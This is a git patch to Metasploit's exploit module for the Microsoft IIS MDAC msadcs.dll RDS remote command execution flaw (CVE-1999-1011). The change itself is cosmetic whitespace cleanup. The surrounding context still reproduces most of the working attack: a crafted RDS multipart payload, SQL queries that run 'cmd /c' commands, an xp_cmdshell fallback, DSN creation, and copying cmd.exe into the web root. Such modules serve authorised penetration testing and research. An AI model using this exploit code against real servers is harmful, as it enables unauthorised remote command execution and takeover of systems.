From 6d0dbcb106b21201d328829b5a9df669d613d4bc Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Wed, 6 Jun 2012 11:10:05 -0500
Subject: [PATCH] Remove whitespace
---
 modules/exploits/windows/iis/msadc.rb | 80 ++++++++++++---------
 1 file changed, 36 insertions(+), 44 deletions(-)
diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb
index 12dfd0ed08..5232eeb7d6 100644
--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -20,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def initialize
 super(
- 'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution',
+ 'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution',
 'Description' => %q{
 This module can be used to execute arbitrary commands on IIS servers that expose the /msadc/msadcs.dll Microsoft Data Access Components
@@ -39,20 +35,19 @@ class Metasploit3 < Msf::Exploit::Remote
 and useful for debugging. Also set NAME to obtain the remote hostname, and METHOD to use the alternative VbBusObj technique.
 },
- 'Author' => 'patrick',
- 'Version' => '$Revision$',
- 'Platform' => 'win',
- 'References' =>
+ 'Author' => 'patrick',
+ 'Platform' => 'win',
+ 'References' =>
 [
 ['OSVDB', '272'],
 ['BID', '529'],
 ['CVE', '1999-1011'],
 ['MSB', 'ms98-004'],
- ['MSB', 'ms99-025'],
+ ['MSB', 'ms99-025']
 ],
- 'Targets' =>
+ 'Targets' =>
 [
- # patrickw tested meterpreter OK 20120601
+ # patrickw tested meterpreter OK 20120601
 # nt4server w/sp3, ie4.02, option pack, IIS4.0, mdac 1.5, over msaccess shell, reverse_nonx
 # w2k w/sp0, IIS5.0, mdac 2.7 RTM, sql2000, handunsf.reg, over xp_cmdshell, reverse_tcp
 [ 'Automatic', { } ],
@@ -91,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote
 def create_dsn(drive, dsn)
 req = "/scripts/tools/newdsn.exe?driver=Microsoft\%2BAccess\%2BDriver\%2B\%28*.mdb\%29\&dsn=#{dsn}\&dbq=#{drive}\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr="
-
+
 res = send_request_raw({
- 'uri' => req,
+ 'uri' => req,
 })
-
+
 if (res and res.code == 200 and res.body =~ /

Datasource creation FAILED! The most likely cause is invalid attributes<\/B><\/H2>/)
 vprint_error("DSN CREATE failed for drive #{drive} with #{dsn}.")
 return false
@@ -104,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
 return true
 end
 end
-
+
 def exec_cmd(sql, cmd, d)
 boundary = rand_text_alphanumeric(8)
 method = datastore['METHOD'] ? "VbBusObj.VbBusObjCls.GetRecordset" : "AdvancedDataFactory.Query"
@@ -118,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 vprint_status("Attempting to request: #{select} on #{d}")
-
+
 query = "\x02\x00\x03\x00\x08\x00#{[select.size].pack('S')}\x00\x00#{select}\x08\x00#{[dsn.size].pack('S')}\x00\x00#{dsn}"
-
- sploit = "--#{boundary}\r\n"
+
+ sploit = "--#{boundary}\r\n"
 sploit << "Content-Type: application/x-varg\r\n"
 sploit << "Content-Length: #{query.length}\r\n\r\n"
 sploit << query
 sploit << "\r\n--#{boundary}--\r\n"
-
+
 data = "ADCClientVersion:01.06\r\n"
 data << 'Content-Type: multipart/mixed; boundary=' + boundary +'; num-args=3'
 data << "\r\n\r\n"
@@ -140,14 +135,12 @@ class Metasploit3 < Msf::Exploit::Remote
 'Content-Length' => data.length,
 'Connection' => "Keep-Alive",
 },
-
 'method' => 'POST',
 'data' => data,
-
 })
-
+
 response = Rex::Text.to_ascii(res.body, 'utf-16be')
-
+
 if (response =~ /HTTP:\/\/www.microsoft.com\/activex.vip\/adofx/ || res.body =~ /o.u.t.p.u.t./)
 vprint_good("Command was successfully executed! Statement: #{select} Driver: #{d}")
 return true, sql, d
@@ -190,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
 vprint_error("Server accepted request however it failed for reasons unknown.")
 elsif (res.body =~ /\x09\x00\x01/) # magic bytes? rfp used it too :P maybe a retval?
 vprint_error("Unknown reply - but the command didn't execute")
- else
+ else
 vprint_status("Unknown reply - server is likely patched:\n#{response}")
 end
 return false
@@ -205,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
 data = "ADCClientVersion:01.06\r\n"
 data << 'Content-Type: multipart/mixed; boundary=' + boundary +'; num-args=0'
 data << "\r\n\r\n--#{boundary}--\r\n"
-
+
 res = send_request_raw({
 'uri' => datastore['PATH'] + '/VbBusObj.VbBusObjCls.GetMachineName',
 'agent' => 'ACTIVEDATA',
@@ -214,12 +207,11 @@ class Metasploit3 < Msf::Exploit::Remote
 'Content-Length' => data.length,
 'Connection' => "Keep-Alive",
 },
-
 'method' => 'POST',
 'data' => data,
-
+
 })
-
+
 if (res.code == 200 and res.body =~ /\x01(.+)/) # Should return the hostname
 print_good("Hostname: #{$1}")
 end
@@ -237,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote
 "\\system32\\ias\\ias.mdb", "\\system32\\ias\\dnary.mdb", "\\system32\\certlog\\certsrv.mdb" ]
-
+
 mdbs = [ "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", #these are non-windows
 "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
@@ -255,16 +247,16 @@ class Metasploit3 < Msf::Exploit::Remote
 "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ]
-
+
 print_status("Step 1: Trying raw driver to btcustmr.mdb")
-
+
 drives.each do |drive|
 sysdirs.each do |sysdir|
 ret = exec_cmd("Select * from Customers where City=", "cmd /c echo x", "driver={Microsoft Access Driver (*.mdb)};dbq=#{drive}:\\#{sysdir}\\help\\iis\\htm\\tutorial\\btcustmr.mdb;")
 return ret if (ret)
 end
 end
-
+
 print_status("Step 2: Trying to make our own DSN...")
 x = false # Stop if we make a DSN
 drives.each do |drive|
@@ -274,21 +266,21 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 end
 end
-
+
 table = rand_text_alphanumeric(3)
 print_status("Step 3: Trying to create a new table in our own DSN...")
 exec_cmd("create table #{table} (B int, C varchar(10))", nil, "driver={Microsoft Access Driver (*.mdb)};dbq=c:\\sys.mdb;") # this is general make table query
-
+
 print_status("Step 4: Trying to execute our command via our own DSN and table...")
 ret = exec_cmd("select * from #{table} where C=", "cmd /c echo x", "driver={Microsoft Access Driver (*.mdb)};dbq=c:\\sys.mdb;") # this is general exploit table query
 return ret if (ret)
-
+
 print_status("Step 5: Trying to execute our command via known DSNs...")
 dsns.each do |dsn|
 ret = exec_cmd("select * from MSysModules where name=", "cmd /c echo x", dsn) # this is table-independent query (new)
 return ret if (ret)
 end
-
+
 print_status("Step 6: Trying known system .mdbs...")
 drives.each do |drive|
 sysdirs.each do |sysdir|
@@ -299,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 end
 end
-
+
 print_status("Step 7: Trying known program file .mdbs...")
 drives.each do |drive|
 mdbs.each do |mdb|
@@ -308,14 +300,14 @@ class Metasploit3 < Msf::Exploit::Remote
 return ret if (ret)
 end
 end
-
+
 print_status("Step 8: Trying SQL xp_cmdshell method...")
 ret = exec_cmd("EXEC master..xp_cmdshell", "cmd /c echo x", "driver={SQL Server};server=(#{datastore['DBHOST']});database=#{datastore['DBNAME']};uid=#{datastore['DBUID']};pwd=#{datastore['DBPASSWORD']}") # based on hdm's sqlrds.pl :)
 return ret if (ret)
-
+
 return -1
 end
-
+
 def exploit
 print_status("Searching for valid command execution point...")
 x = false
@@ -325,10 +317,10 @@ class Metasploit3 < Msf::Exploit::Remote
 break
 end
 end
-
+
 if (x == true)
 print_good("Successful command execution found!")
-
+
 # now copy the file
 exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
 print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
@@ -396,7 +388,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def cleanup
 framework.events.remove_exploit_subscriber(self)
 end
-
+
 def execute_command(cmd, opts = {})
 # Don't try the start command...
 # Using the "start" method doesn't seem to make iis very happy :(